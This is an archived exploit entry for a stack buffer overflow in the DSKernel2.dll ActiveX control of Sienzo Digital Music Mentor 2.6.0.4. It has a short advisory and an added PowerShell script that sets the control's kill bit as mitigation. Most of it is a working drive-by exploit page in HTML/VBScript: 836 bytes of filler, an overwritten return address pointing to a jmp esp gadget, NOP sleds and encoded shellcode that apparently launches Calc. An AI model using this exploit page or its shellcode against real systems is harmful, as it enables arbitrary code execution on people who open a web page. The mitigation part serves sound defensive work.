Vendor: Digital Music Mentor (DMM)
Author: Parveen Vashishtha
CVSS: 7.5 (HIGH)
CWE: Stack Overflow
Product Name: Digital Music Mentor (DMM)
Affected Version From: 2.6.0.4
Affected Version To: 2.6.0.4
Patch Exists: NO
Platforms Tested: Windows XP
Year: 2007

Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) SetEvalExpiryDate Method Stack Overflow EIP Overwrite Exploit

This exploit targets the SetEvalExpiryDate method exposed by the DSKernel2.dll ActiveX control shipped with Sienzo Digital Music Mentor (DMM) version 2.6.0.4. An overly long string passed as the method's first (Key) argument overflows a stack buffer and overwrites the saved return address, giving an attacker control of the EIP register and leading to arbitrary code execution when a victim opens a web page that instantiates the control.

Mitigation:

Update to a patched version of Sienzo Digital Music Mentor (DMM) to mitigate this vulnerability.
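Since no vendor patch is listed, the standard stop-gap for an exploitable ActiveX control is to set its kill bit so Internet Explorer refuses to instantiate it. The following PowerShell script is an added example, not part of the original advisory or Exploit-DB entry; it uses the CLSID from the exploit's OBJECT tag and assumes it is run from an elevated PowerShell prompt on the affected Windows host.

```powershell
# Added example (not part of the original advisory): set the ActiveX "kill bit"
# for the DSKernel2 control so Internet Explorer will not instantiate it.
# The CLSID is the one from the exploit's <OBJECT> tag; 0x400 is the documented
# "Compatibility Flags" value for the kill bit. Requires an elevated prompt.
$Clsid   = '{E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9}'
$KillBit = 0x400

# On 64-bit Windows the 32-bit IE process reads the Wow6432Node view, so the
# flag is applied there too when that hive exists (32-bit XP has no such key).
$Paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $Paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

foreach ($Path in $Paths) {
    # Create the per-CLSID key if it does not exist yet.
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }

    # Preserve any flags already present and OR in the kill bit.
    $Current = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if (-not $Current) { $Current = 0 }
    $New = $Current -bor $KillBit
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $New -Type DWord

    # Verify: the stored value must now contain the kill bit.
    $Check = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags').'Compatibility Flags'
    if (($Check -band $KillBit) -eq $KillBit) {
        Write-Output ("Kill bit set for {0} under {1} (flags=0x{2:X})" -f $Clsid, $Path, $Check)
    } else {
        Write-Error "Failed to set kill bit under $Path"
    }
}
```

After running it, loading the exploit page in Internet Explorer should no longer create the control, which can be confirmed by checking that the OBJECT tag yields no instance.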

Exploit-DB raw data:

<!--

  ===============================================================================================
      Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) SetEvalExpiryDate Method Stack Overflow EIP Overwrite Exploit
                                                By Parveen Vashishtha
  ===============================================================================================

  Date : 07-05-2007

  Tested on Windows XP Latest -- Opens Calc

  PS. This was written for educational purpose. Use it at your own risk. Author will not be
      responsible for any damage.

  Thanks to Metasploit and Stroke

-->


<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9" > </OBJECT>

<script language="vbscript">


shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")


' 15-byte NOP sled (0x90) placed around the payload.
nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")

' Value written over the saved EIP: the address of a "jmp esp" gadget
' (0x7CA76981, little-endian) so execution lands in the data on the stack.
jmp_esp=unescape("%81%69%A7%7C")

' Informational fields describing the vulnerable method; the script does not use them.
targetFile = "C:\Program Files\Sienzo\DMM\DSKernel2.dll"
prototype  = "Sub SetEvalExpiryDate ( ByVal Key As String ,  ByVal lCategory As Long ,  ByVal lModuleID As Long ,  ByVal lYear As Long ,  ByVal lMonth As Long ,  ByVal lDay As Long ,  ByVal vbReset As Boolean )"
memberName = "SetEvalExpiryDate"
progid     = "LMDSKernelLib2.LMDSKernel2"
argCount   = 7

' 836 bytes of filler reach from the start of the stack buffer to the saved return address.
arg1=String(836, "A")
arg2=1
arg3=1
arg4=1
arg5=1
arg6=1
arg7=True

' Key argument = filler + return address + NOP sled + shellcode + trailing NOPs.
arg1=arg1+jmp_esp+nop+nop+shellcode+nop

' Calling the method with the oversized Key string triggers the overflow.
target.SetEvalExpiryDate arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7

</script>
</body>
</html>

# milw0rm.com [2007-05-09]